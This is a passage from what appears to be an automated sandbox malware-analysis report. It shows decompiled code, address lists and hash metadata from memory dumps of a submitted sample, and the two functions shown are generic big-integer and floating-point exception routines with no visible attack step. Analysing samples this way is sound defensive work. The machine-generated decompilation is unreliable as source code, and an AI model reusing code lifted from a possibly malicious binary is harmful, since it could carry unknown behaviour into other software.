								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t111);
									E012385AB(_t88, _t79, 0, 0);
								}
							}
							_pop(_t106);
							_pop(_t113);
							__eflags = _v12 ^ _t117;
							_pop(_t80);
							return E01232550(_t80, _v12 ^ _t117, _t102, _t106, _t113);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}
























































        0x012385b0
        0x012385b1
        0x012385b4
        0x012385b4
        0x012385b7
        0x012385b7
        0x012385b9
        0x012385ba
        0x012385c4
        0x012385c7
        0x012385ca
        0x012385cf
        0x012385d8
        0x012385db
        0x012385e5
        0x012385e8
        0x012385e9
        0x012385eb
        0x012385ff
        0x012385ff
        0x01238602
        0x0123860c
        0x01238611
        0x01238614
        0x01238616
        0x00000000
        0x01238618
        0x0123861c
        0x01238625
        0x0123862b
        0x00000000
        0x0123862e
        0x012385ed
        0x012385ed
        0x012385f3
        0x012385f8
        0x012385fb
        0x012385fd
        0x01238634
        0x01238636
        0x01238637
        0x01238638
        0x01238639
        0x0123863a
        0x0123863b
        0x01238640
        0x01238644
        0x01238646
        0x0123864c
        0x01238653
        0x01238656
        0x01238659
        0x0123865a
        0x0123865d
        0x0123865e
        0x01238661
        0x01238662
        0x01238683
        0x01238683
        0x01238685
        0x00000000
        0x00000000
        0x0123866a
        0x0123866c
        0x0123866e
        0x01238670
        0x01238672
        0x01238674
        0x01238676
        0x01238681
        0x00000000
        0x01238681
        0x01238676
        0x01238672
        0x00000000
        0x0123866e
        0x01238687
        0x01238689
        0x0123868c
        0x012386a5
        0x012386a5
        0x012386a7
        0x012386aa
        0x012386ba
        0x012386bc
        0x012386bc
        0x012386ac
        0x012386ac
        0x012386af
        0x00000000
        0x012386b1
        0x012386b1
        0x012386b4
        0x00000000
        0x012386b6
        0x012386b6
        0x012386b6
        0x012386b4
        0x012386af
        0x012386c2
        0x012386ca
        0x012386ce
        0x012386dc
        0x012386e1
        0x012386f6
        0x012386f8
        0x012386fe
        0x01238701
        0x01238733
        0x01238733
        0x01238735
        0x01238738
        0x0123873e
        0x0123873e
        0x01238745
        0x0123875f
        0x0123875f
        0x0123876e
        0x01238773
        0x01238776
        0x01238778
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x01238747
        0x01238747
        0x0123874d
        0x0123874f
        0x00000000
        0x01238751
        0x01238751
        0x01238754
        0x00000000
        0x01238756
        0x01238756
        0x0123875d
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0123875d
        0x01238754
        0x0123874f
        0x00000000
        0x0123877a
        0x01238782
        0x01238788
        0x0123878a
        0x0123878a
        0x01238792
        0x01238797
        0x0123879f
        0x012387a2
        0x012387a4
        0x012387b8
        0x012387bd
        0x01238703
        0x01238703
        0x01238707
        0x0123870f
        0x0123870f
        0x0123870f
        0x01238711
        0x01238714
        0x01238717
        0x01238717
        0x0123868e
        0x01238691
        0x01238693
        0x00000000
        0x01238695
        0x01238695
        0x0123869b
        0x012386a0
        0x01238693
        0x01238722
        0x01238723
        0x01238724
        0x01238726
        0x0123872f
        0x00000000
        0x00000000
        0x00000000
        0x012385fd
        0x012385d1
        0x012385d3
        0x0123862f
        0x01238633
        0x01238633
        0x00000000

        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID:
        • String ID: .
        • API String ID: 0-248832578
        • Opcode ID: c418c09821a7a5b16ec630f80ddc81d15c039ece87fefa64f3f820f500899e4f
        • Instruction ID: 1330484a687aa7e4b692d931f0b18a681d1b07f128c67a121d3ed224265d8aa3
        • Opcode Fuzzy Hash: c418c09821a7a5b16ec630f80ddc81d15c039ece87fefa64f3f820f500899e4f
        • Instruction Fuzzy Hash: A9312BB191010AAFDB258E78DC84EFB7BBDDFC5304F0402A9F618DB251E6709A458B90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123AF60, Relevance: 3.5, APIs: 2, Instructions: 464COMMONCrypto
        Download Yara Rule
        C-Code - Quality: 90%
        			E0123AF60(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E012403F0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E01240180(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E01240220(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E01240220(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x123c57d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E01240180( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0123903C(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0123903C(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0123903C(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































        0x0123af6c
        0x0123af6f
        0x0123af73
        0x0123af7d
        0x0123af80
        0x0123af82
        0x0123af84
        0x0123af91
        0x0123af91
        0x0123af94
        0x0123af94
        0x0123af97
        0x0123af9a
        0x0123af9c
        0x0123b0cf
        0x0123b0d1
        0x0123b11a
        0x0123b11e
        0x0123b124
        0x0123b0d3
        0x0123b0d5
        0x0123b0d8
        0x0123b0da
        0x0123b0dd
        0x0123b0df
        0x0123b0e1
        0x0123b115
        0x0123b115
        0x0123b115
        0x0123b0e3
        0x0123b0e8
        0x0123b0ee
        0x0123b0ee
        0x0123b0f1
        0x0123b0f3
        0x0123b0f5
        0x00000000
        0x00000000
        0x0123b0f7
        0x0123b0f8
        0x0123b0fb
        0x0123b0fe
        0x0123b100
        0x00000000
        0x0123b102
        0x00000000
        0x0123b102
        0x00000000
        0x0123b100
        0x0123b104
        0x0123b10b
        0x0123b10f
        0x0123b113
        0x00000000
        0x00000000
        0x0123b113
        0x0123b116
        0x0123b116
        0x0123b118
        0x0123b125
        0x0123b128
        0x0123b12b
        0x0123b12e
        0x0123b12e
        0x0123b132
        0x0123b135
        0x0123b138
        0x0123b13b
        0x0123b146
        0x0123b13d
        0x0123b142
        0x0123b142
        0x0123b150
        0x0123b155
        0x0123b158
        0x0123b15a
        0x0123b164
        0x0123b167
        0x0123b16e
        0x0123b171
        0x0123b174
        0x0123b17c
        0x0123b182
        0x0123b182
        0x0123b182
        0x0123b182
        0x0123b174
        0x0123b187
        0x0123b18e
        0x0123b18e
        0x0123b191
        0x0123b194
        0x0123b3c6
        0x0123b3c6
        0x0123b19a
        0x0123b19a
        0x0123b1a0
        0x0123b1a3
        0x0123b1a6
        0x0123b1a9
        0x0123b1ac
        0x0123b1af
        0x0123b1b2
        0x0123b1b2
        0x0123b1b5
        0x0123b1bc
        0x0123b1bc
        0x0123b1b7
        0x0123b1b7
        0x0123b1b7
        0x0123b1be
        0x0123b1c2
        0x0123b1c5
        0x0123b1c7
        0x0123b1ca
        0x0123b1d1
        0x0123b1d4
        0x0123b1d7
        0x0123b1e2
        0x0123b1e5
        0x0123b1ea
        0x0123b1ef
        0x0123b1f6
        0x0123b1fb
        0x0123b1fd
        0x0123b1ff
        0x0123b203
        0x0123b206
        0x0123b209
        0x0123b211
        0x0123b21a
        0x0123b21a
        0x0123b21c
        0x0123b21f
        0x0123b21f
        0x0123b209
        0x0123b229
        0x0123b22e
        0x0123b233
        0x0123b235
        0x0123b238
        0x0123b23a
        0x0123b23d
        0x0123b240
        0x0123b242
        0x0123b245
        0x0123b248
        0x0123b24a
        0x0123b251
        0x0123b256
        0x0123b259
        0x0123b263
        0x0123b265
        0x0123b267
        0x0123b26a
        0x0123b26a
        0x0123b26c
        0x0123b26f
        0x0123b272
        0x0123b275
        0x0123b278
        0x0123b24c
        0x0123b24c
        0x0123b24f
        0x00000000
        0x00000000
        0x0123b24f
        0x0123b27b
        0x0123b27d
        0x0123b27f
        0x00000000
        0x0123b281
        0x0123b281
        0x0123b284
        0x0123b286
        0x0123b286
        0x0123b294
        0x0123b297
        0x0123b29c
        0x0123b29e
        0x00000000
        0x00000000
        0x0123b2a0
        0x0123b2a7
        0x0123b2a7
        0x0123b2aa
        0x0123b2ad
        0x0123b2b0
        0x0123b2b3
        0x0123b2b3
        0x0123b2b6
        0x0123b2b9
        0x0123b2bd
        0x0123b2c0
        0x0123b2c2
        0x0123b2c5
        0x00000000
        0x00000000
        0x0123b2c7
        0x0123b2c5
        0x0123b2a2
        0x0123b2a2
        0x0123b2a5
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0123b2a5
        0x0123b2cc
        0x0123b2cc
        0x00000000
        0x0123b2cc
        0x0123b2c9
        0x00000000
        0x0123b2c9
        0x0123b284
        0x0123b27f
        0x0123b2cf
        0x0123b2cf
        0x0123b2d1
        0x0123b2db
        0x0123b2db
        0x0123b2de
        0x0123b2e0
        0x0123b2e2
        0x0123b2e4
        0x0123b2e9
        0x0123b2ec
        0x0123b2ec
        0x0123b2ef
        0x0123b2f2
        0x0123b2f5
        0x0123b2f7
        0x0123b30c
        0x0123b30e
        0x0123b310
        0x0123b312
        0x0123b314
        0x0123b316
        0x0123b318
        0x0123b31a
        0x0123b31d
        0x0123b31d
        0x0123b321
        0x0123b323
        0x0123b329
        0x0123b32c
        0x0123b32c
        0x0123b32c
        0x0123b330
        0x0123b330
        0x0123b335
        0x0123b338
        0x0123b338
        0x0123b33d
        0x0123b33f
        0x0123b341
        0x0123b348
        0x0123b348
        0x0123b34a
        0x0123b34f
        0x0123b351
        0x0123b354
        0x0123b354
        0x0123b357
        0x0123b360
        0x0123b360
        0x0123b362
        0x0123b362
        0x0123b367
        0x0123b36d
        0x0123b371
        0x0123b374
        0x0123b377
        0x0123b379
        0x0123b379
        0x0123b379
        0x0123b37e
        0x0123b37e
        0x0123b381
        0x0123b384
        0x0123b343
        0x0123b343
        0x0123b346
        0x00000000
        0x00000000
        0x0123b346
        0x0123b341
        0x0123b38b
        0x0123b38b
        0x0123b38c
        0x0123b2d3
        0x0123b2d3
        0x0123b2d5
        0x00000000
        0x00000000
        0x0123b2d5
        0x0123b39c
        0x0123b3a1
        0x0123b3a4
        0x0123b3a8
        0x0123b3a9
        0x0123b3ac
        0x0123b3af
        0x0123b3b0
        0x0123b3b3
        0x0123b3b6
        0x0123b3b9
        0x0123b3bc
        0x0123b3bc
        0x0123b3c4
        0x0123b3cb
        0x0123b3cc
        0x0123b3ce
        0x0123b3d0
        0x0123b3d2
        0x0123b3d5
        0x0123b3e0
        0x0123b3e0
        0x0123b3e6
        0x0123b3e6
        0x0123b3e9
        0x0123b3ea
        0x0123b3ea
        0x0123b3e0
        0x0123b3ee
        0x0123b3f0
        0x0123b3f2
        0x0123b3f4
        0x0123b3f4
        0x0123b3f6
        0x0123b3fa
        0x00000000
        0x00000000
        0x0123b3fc
        0x0123b3fc
        0x0123b3ff
        0x0123b401
        0x00000000
        0x00000000
        0x00000000
        0x0123b401
        0x0123b3f4
        0x0123b403
        0x0123b40d
        0x00000000
        0x00000000
        0x00000000
        0x0123b118
        0x0123afa2
        0x0123afa2
        0x0123afa2
        0x0123afa5
        0x0123afa8
        0x0123afab
        0x0123afdc
        0x0123afde
        0x0123b029
        0x0123b02b
        0x0123b032
        0x0123b039
        0x0123b03c
        0x0123b03f
        0x0123b045
        0x0123b045
        0x0123b046
        0x0123b049
        0x0123b050
        0x0123b059
        0x0123b05e
        0x0123b061
        0x0123b066
        0x0123b069
        0x0123b06b
        0x0123b070
        0x0123b073
        0x0123b076
        0x0123b076
        0x0123b076
        0x0123b07a
        0x0123b07d
        0x0123b07d
        0x0123b082
        0x0123b082
        0x0123b08d
        0x0123b098
        0x0123b098
        0x0123b09b
        0x0123b0a7
        0x0123b0ac
        0x0123b0b7
        0x0123b0b9
        0x0123b0bb
        0x0123b0c1
        0x0123b0c6
        0x0123b0c8
        0x0123b0ce
        0x0123afe0
        0x0123afec
        0x0123afec
        0x0123afef
        0x0123afff
        0x0123b005
        0x0123b00c
        0x0123b00e
        0x0123b016
        0x0123b018
        0x0123b01a
        0x0123b01f
        0x0123b022
        0x0123b028
        0x0123b028
        0x0123afad
        0x0123afb0
        0x0123afb4
        0x0123afba
        0x0123afc9
        0x0123afd3
        0x0123afdb
        0x0123afdb
        0x0123afab
        0x0123af86
        0x0123af89
        0x0123af8f
        0x0123af8f
        0x0123af75
        0x0123af7b
        0x0123af7b

        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c89a6f7580dc440778903e2e69591d47a13b67b5f9ae20e3a1f00666a70af9cf
        • Instruction ID: 3ab51aee9de3acc0f91fc3996f972da748e1f2d8f02b4360058bfbb92eee1673
        • Opcode Fuzzy Hash: c89a6f7580dc440778903e2e69591d47a13b67b5f9ae20e3a1f00666a70af9cf
        • Instruction Fuzzy Hash: 1E022DB1E1021A9BDF15CFA9C8806ADFBF5FF88314F15426AD919E7385D731AA418B80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0123FA1C, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
        Download Yara Rule
        C-Code - Quality: 100%
        			E0123FA1C(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0123D337(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0123D29D(_t254);
